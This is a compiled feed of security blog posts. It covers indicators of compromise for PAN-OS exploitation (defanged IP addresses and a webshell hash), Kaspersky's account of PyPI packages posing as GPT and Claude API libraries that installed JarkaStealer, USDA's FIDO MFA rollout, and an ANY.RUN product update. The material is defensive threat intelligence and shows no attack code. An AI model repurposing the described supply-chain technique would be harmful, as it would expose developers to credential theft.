    • New or suspicious administrator accounts.
    • Command execution logs indicating unauthorized access.

Enhanced Factory Reset (EFR)

Organizations detecting evidence of compromise should:

  1. Take affected devices offline immediately.
  2. Perform an Enhanced Factory Reset (EFR) in collaboration with Palo Alto Networks support.
  3. Reconfigure the device with updated firmware and secure management policies.

Indicators of Compromise (IOCs)

IP Addresses Observed in Scans and Exploits

  • Scanning Sources:
    • 41.215.28[.]241
    • 45.32.110[.]123
    • 103.112.106[.]17
    • 104.28.240[.]123
    • 182.78.17[.]137
    • 216.73.160[.]186

  • Threat Actor Proxies:
    • 91.208.197[.]167
    • 104.28.208[.]123 
    • 136.144.17[.]146
    • 136.144.17[.]149
    • 136.144.17[.]154
    • 136.144.17[.]158 
    • 136.144.17[.]161
    • 136.144.17[.]164
    • 136.144.17[.]166
    • 136.144.17[.]167
    • 136.144.17[.]170
    • 136.144.17[.]176
    • 136.144.17[.]177
    • 136.144.17[.]178
    • 136.144.17[.]180
    • 173.239.218[.]248 
    • 173.239.218[.]251
    • 209.200.246[.]173
    • 209.200.246[.]184
    • 216.73.162[.]69
    • 216.73.162[.]71
    • 216.73.162[.]73
    • 216.73.162[.]74
    •  

Malicious Artifacts

  • Webshell payload hash (PHP webshell payload dropped on a compromised firewall – SHA256): 3C5F9034C86CB1952AA5BB07B4F77CE7D8BB5CC9FE5C029A32C72ADC7E814668.

References:

https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032

https://www.bsi.bund.de/SharedDocs/Cybersicherheitswarnungen/DE/2024/2024-291133-1032.pdf?__blob=publicationFile&v=5

https://unit42.paloaltonetworks.com/cve-2024-0012-cve-2024-9474

The post German CERT Warns ‘Attacks are Happening,’ Urges PAN-OS Chained Vulnerabilities’ Patching appeared first on Cyble.

Blog – Cyble – ​Read More

Packages with infostealer found in PyPI repository | Kaspersky official blog

Our Global Research and Analysis Team (GReAT) experts have discovered two malicious packages in the Python Package Index (PyPI) – a popular third-party software repository for Python. According to the packages’ descriptions, they were libraries that allowed to work with popular LLMs (large language models). However, in fact, they imitated the declared functionality using the demo version of ChatGPT, and their main purpose was to install JarkaStealer malware.

The packages were available for download for more than a year. Judging by the repository’s statistics, during this time they were downloaded more than 1700 times by users from more than 30 countries.

Malicious packages and what were they used for

The malicious packages were uploaded to the repository by one author and, in fact, differed from each other only in name and description. The first was called “gptplus” and allegedly allowed access to the GPT-4 Turbo API from OpenAI; the second was called “claudeai-eng” and, according to the description, also promised access to the Claude AI API from Anthropic PBC.

The descriptions of both packages included usage examples that explained how to create chats and send messages to language models. But in reality, the code of these packages contained a mechanism for interaction with the ChatGPT demo proxy in order to convince the victim that the package was working. Meanwhile, the __init__.py file contained in the packages decoded the data contained inside and downloaded the JavaUpdater.jar file from the GitHub repository. If Java was not found on the victim’s machine, it also downloaded and installed the Java Runtime Environment (JRE) from Dropbox. The jar file itself contained the JarkaStealer malware, which was used to compromise the development environment and for undetected exfiltration of stolen data.

What is JarkaStealer malware, and why is it dangerous?

JarkaStealer is malware, presumably written by Russian-speaking authors, which is used primarily to collect confidential data and send it to the attackers. Here’s what it can do:

  • Steal data from various browsers;
  • Take screenshots;
  • Collect system information;
  • Steal session tokens from various applications (including Telegram, Discord, Steam, and even a Minecraft cheat client);
  • Interrupt browser processes to retrieve saved data.

The collected information is then archived, sent to the attacker’s server, and then deleted from the victim’s machine.

The malware authors distribute it through Telegram using the malware-as-a-service (MaaS) model. However, we also found the source code of JarkaStealer on GitHub, so it’s possible that this campaign didn’t involve the original authors of the malware.

How to stay safe

We promptly informed PyPI administrators about the malicious implants in the gptplus and claudeai-eng packages, and as of now they’ve already been removed from the repository. However, there’s no guarantee that this (or a similar) trick won’t be pulled on some other platform. We continue to monitor activity related to the JarkaStealer malware and look for other threats in open source software repositories.

For those who downloaded and used one of the malicious packages, the main recommendation is to immediately delete it. The malware doesn’t have persistence functionality, so it’s launched only when the package is used. However, all passwords and session tokens that were used on a victim’s machine could have been stolen by JarkaStealer, and so should be immediately changed or reissued.

We also recommend that developers be especially vigilant when working with open source software packages, and inspect them thoroughly before integrating them into their projects. This includes a detailed analysis of the dependencies and the respective supply chain of software products – especially when it comes to such a hyped topic as the integration of AI technologies.

In this case, the author’s profile’s creation date on PyPI could have been a red flag. If you look closely at the screenshot above, you can see that both packages were published on the same day, while the account that published them was registered just a couple of days earlier.

In order to minimize the risks of working with third-party open source software packages and avoid an attack on the supply chain, we recommend including in DevSecOps processes the Kaspersky Open Source Software Threats Data Feed, which is designed specifically for monitoring used open source components in order to detect threats that might be hidden inside.

Kaspersky official blog – ​Read More

USDA Implements Phishing-Resistant Multi-Factor Authentication (MFA) with Fast Identity Online (FIDO)

USDA

Overview

The U.S. Department of Agriculture (USDA) has announced the use of Fast IDentity Online (FIDO) protocols, a new solution for phishing-resistant authentication. This shift to FIDO-based multi-factor authentication (MFA) has proven successful in securing USDA systems against credential theft and phishing attacks.

With many seasonal employees and workers in specialized environments, such as laboratories requiring decontamination procedures, USDA cannot fully rely on Personal Identity Verification (PIV) cards, which are typically used for secure authentication across government agencies.

USDA’s workforce includes not only full-time employees but also a large number of seasonal workers who are ineligible for PIV cards. Furthermore, certain USDA staff work in environments, such as bio-containment labs, where standard PIV cards cannot survive the decontamination processes required.

Historically, USDA managed this by providing users with temporary user IDs and passwords. However, as credential phishing attacks became more sophisticated, the USDA found this approach increasingly vulnerable to cyber threats.

USDA identified the need for a secure, phishing-resistant authentication method that would work across a variety of environments and use cases. The agency needed to move beyond passwords and user IDs, adopting a solution that would meet modern cybersecurity standards while accommodating the unique needs of its workforce.

The Role of FIDO in Phishing-Resistant MFA

FIDO is a set of open standards designed to provide secure, passwordless authentication. Unlike traditional forms of MFA, which can still be vulnerable to phishing attacks, FIDO leverages public key cryptography to bind credentials to the user’s device. This approach is inherently resistant to phishing attempts because even if a malicious actor attempts to trick users into revealing their credentials, they cannot access the system without the physical device used for authentication.

The USDA’s decision to adopt FIDO was driven by its ability to prevent credential phishing—one of the most common and dangerous threats faced by organizations today. With FIDO, USDA employees can authenticate without passwords, using cryptographic keys stored on secure devices. This approach mitigates the risk posed by increasingly sophisticated credential phishing attacks that exploit the weaknesses of SMS codes, authenticator apps, or even push notifications.

The USDA’s Implementation Process

Before transitioning to FIDO, USDA’s Identity, Credential, and Access Management (ICAM) division conducted a thorough review of the agency’s needs. They identified key use cases where employees could not use PIV cards and where traditional MFA methods were insufficient.

These included seasonal workers, employees waiting for PIV cards, and those working in high-security or physically demanding environments where card-based solutions were impractical.

With a centralized identity management system already in place, USDA was well-positioned to implement a FIDO-based solution. The agency used Microsoft Entra ID to integrate FIDO capabilities, allowing them to extend phishing-resistant authentication to core services such as:

  • Windows desktop login
  • Microsoft 365 access
  • Virtual Private Network (VPN) access
  • Single Sign-On (SSO) systems

The centralization of USDA’s ICAM system under a unified platform allowed for more agile updates, enabling the rapid rollout of FIDO across various IT environments. By focusing on four main enterprise services, USDA was able to significantly reduce its exposure to phishing attacks while meeting the needs of its diverse workforce.

Key Features and Benefits of USDA’s MFA Solution

USDA’s adoption of FIDO technology was not just about protecting individual users—it was about addressing a systemic issue of security across the organization. FIDO protocols were integrated with USDA’s existing SSO platform, which serves over 600 internal applications. This integration allowed USDA to enhance the security of both cloud-based and on-premises systems, protecting users from more advanced forms of MFA bypass techniques.

FIDO’s support for hardware-bound authentication methods, like Microsoft’s Windows Hello for Business (WHfB) and FIPS-140 validated security keys, played a pivotal role. These devices are bound to the user’s hardware, making it almost impossible for a hacker to bypass the authentication process without physical access to the device.

Furthermore, USDA utilized its centralized human resources (HR) system as the authoritative source for identity lifecycle management, ensuring that access rights and credentials were appropriately provisioned and de-provisioned. This integration made managing user access more streamlined and secure, particularly as the agency transitioned to more cloud-based services.

The Significance of USDA’s FIDO Implementation

USDA’s early adoption of FIDO technology placed them ahead of the curve in implementing phishing-resistant MFA. Their solution aligns with the broader federal initiative outlined in the U.S. government’s Moving the U.S. Government Toward Zero Trust Cybersecurity Principles (M-22-0922), which mandates the transition to phishing-resistant MFA for federal agencies.

By adopting FIDO, USDA not only improved its security posture but also contributed to the federal push for Zero Trust cybersecurity, a model that assumes breaches are inevitable and advocates for continuous monitoring and verification of user access. FIDO, with its strong encryption and device-based authentication, is a critical part of this Zero Trust framework.

 Recommendations and Mitigations for Other Organizations

USDA’s experience with FIDO offers valuable lessons for other organizations looking to enhance their cybersecurity defenses against phishing and credential theft. The key takeaways from USDA’s implementation include:

  1. USDA’s decision to centralize its ICAM systems under a unified platform helped streamline the deployment of FIDO technology. Centralization improves security, user management, and the agility needed for rapid deployments.
  2. The USDA adopted a philosophy of continuous improvement, piloting FIDO implementations incrementally. By testing solutions on smaller, non-critical user groups, USDA was able to fine-tune its approach before a broader rollout.
  3. Every organization has unique needs. USDA’s approach to understanding its use cases—such as employees without PIV cards or those working in specialized environments—enabled it to tailor its MFA solution to meet specific challenges.
  4. USDA’s involvement in the ICAM community helped them stay informed about emerging threats and best practices. This collaboration provided them with the insights needed to implement a robust solution.

Conclusion

The USDA’s adoption of Fast IDentity Online (FIDO) for phishing-resistant multi-factor authentication (MFA) has strengthened its cybersecurity defenses. By using FIDO, USDA has protected its diverse workforce from credential theft and phishing attacks while ensuring secure access to online systems.

The agency’s centralized approach to Identity, Credential, and Access Management (ICAM) and its commitment to incremental improvements have been a key factor to this success. USDA’s implementation not only meets federal cybersecurity requirements but also exemplifies a proactive approach to Zero Trust principles.

Sources: https://www.cisa.gov/resources-tools/resources/phishing-resistant-multi-factor-authentication-mfa-success-story-usdas-fast-identity-online-fido

The post USDA Implements Phishing-Resistant Multi-Factor Authentication (MFA) with Fast Identity Online (FIDO) appeared first on Cyble.

Blog – Cyble – ​Read More

Explore MITRE ATT&CK Techniques in Real-World Samples with TI Lookup

We’re excited to announce the latest update to Threat Intelligence (TI) Lookup. The enhanced home screen now integrates all techniques and tactics of the MITRE ATT&CK matrix, along with relevant malware samples and signatures. 

Let’s dive into how these updates can transform your workflow and help you tackle threats with greater confidence. 

Redesigned Threat Intelligence Dashboard 

Updated home screen of TI Lookup featuring MITRE ATT&CK matrix 

The centerpiece of the updated Threat Intelligence home screen is the MITRE ATT&CK matrix, neatly organizing tactics and techniques into a clear, actionable layout. 

But here’s where it gets really exciting: The matrix is interactive and lets you explore actual malware samples tied to each technique. This bridges the gap between theoretical knowledge of attack patterns and practical insights into how those patterns are used in real-world attacks. 

The new home screen is designed to be super functional for anyone working with malware, whether you’re a malware analyst, an incident responder, a threat researcher, or just someone curious about how malware operates. 

Collect threat intel on the latest malware and phishing attacks with TI Lookup 



Get trial access


Making the MITRE ATT&CK Matrix Actionable 

One of the core goals of this redesign was to turn the MITRE ATT&CK classification into a working tool for analysts. Instead of just showcasing popular techniques, the matrix now: 

  • Covers all techniques we detect—not just a subset. 
  • Links techniques to detection data and real-world examples. 
  • Helps analysts identify patterns and connections across incidents. 

This update takes analysts beyond just understanding the techniques and tactics. It helps them put that knowledge into action.

They can see how specific techniques have been used in real attacks, spot the malware families tied to certain behaviors, and fine-tune their detection rules to better defend against similar threats in the future. 

How to Use the Interactive MITRE ATT&CK Matrix

With the new home screen, all techniques and tactics are displayed clearly. Clicking on any technique opens up a wealth of information and analysis samples related to it, including its sub-techniques.  

The updated TI Lookup now includes filtering options for MITRE ATT&CK matrix techniques to help users prioritize threats: 

  • Red (danger): High-risk techniques requiring immediate action. 
  • Yellow (warning): Moderate-risk techniques for ongoing analysis. 
  • Blue (other): Low-risk or less urgent techniques. 

Users can refine their view by choosing to hide or display specific categories using the button next to the labels. 

Filtering options for MITRE ATT&CK techniques 

Here’s an example of how the redesigned TI Lookup can be used to explore real-world malware scenarios. Let’s take a closer look at the samples related to spearphishing links. 

In the Initial Access section of the MITRE ATT&CK matrix, you’ll find Phishing (T1566), which includes sub-techniques like spearphishing.  

Spearphishing link sub-technique displayed in TI Lookup 

Clicking on Phishing brings up a new tab with detailed information, including: 

  • An overview of Phishing and its popular sub-techniques, such as spearphishing links, spearphishing attachments, and more. 
  • Insights into related processes and threats. 
Tactics, techniques and procedures of phishing (T1566) 

For example, under the Spearphishing Links sub-technique, you’ll see signatures pulled from actual analysis sessions.

Try TI Lookup’s interactive MITRE ATT&CK matrix 



Explore it now


These might include: 

  • A QR code containing a malicious URL, 
  • A potential phishing attempt leveraging Freshdesk abuse, 
  • Suspicious URLs identified in real-world samples, and much more. 
Signatures related to sprearphishing links pulled from analysis sessions 

When you select a technique, sub-technique, or a specific signature, the service will show relevant samples along with links to corresponding sandbox sessions where the selected TTP was identified. 
 

Clicking the button in the top right corner takes you to the sandbox session

With one click, you can jump into ANY.RUN’s sandbox to observe the behavior of the malware in action and analyze the attack’s overall structure.  

The sandbox session featuring the explored TTP

If you want to dive deeper and gather Indicators of Compromise (IOCs) for your analysis, there are two ways to do so.  

Click the magnifying glass icon next to the TTP to filter the results

First, you can use the search icon next to each threat to instantly uncover additional details, such as domains, IPs, URLs, files, and other relevant context tied to the selected technique. 

Alternatively, by clicking on TI Lookup in the upper-right corner of the tab, you’ll be redirected to the dedicated TI Lookup search page.

Find more samples with the TTP of your interest via TI Lookup  

Here, you can refine your search and explore a wealth of actionable intelligence. TI Lookup is designed to provide everything an analyst needs in one place, comprehensive data about specific techniques, behavior patterns, malware families, and their associated IOCs, IOBs, and IOAs. 

Search results for the “Suspicious URL” TTP 

This new workflow not only makes it easier to understand the processes behind a specific technique but also provides the context needed to develop better strategies for combating similar threats. 

For instance, by analyzing spearphishing links in-depth, you’ll gain insights into the methods attackers use to trick victims and the types of payloads delivered. Armed with this knowledge, you can: 

  • Create detection rules tailored to phishing tactics. 
  • Enhance your defense mechanisms to block similar attacks in the future. 
  • Build detailed reports for stakeholders, complete with real-world examples and actionable recommendations. 


ANY.RUN cloud interactive sandbox interface

Learn to Track Emerging Cyber Threats

Check out expert guide to collecting intelligence on emerging threats with TI Lookup



Conclusion

Whether it’s phishing, persistence techniques, or lateral movement, TI Lookup provides the tools you need to dive deep into the data and make informed decisions. With the redesigned home screen, the service is now even more useful for security analysts and researchers, as it helps them easily find samples where specific TTPs were used.  

Ready to see it in action? Head over to Threat Intelligence Lookup and start exploring! 

About ANY.RUN  

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.  

With ANY.RUN you can: 

  • Detect malware in seconds
  • Interact with samples in real time
  • Save time and money on sandbox setup and maintenance
  • Record and study all aspects of malware behavior
  • Collaborate with your team 
  • Scale as you need

Request free trial of ANY.RUN’s products →

The post Explore MITRE ATT&CK Techniques in Real-World Samples with TI Lookup appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More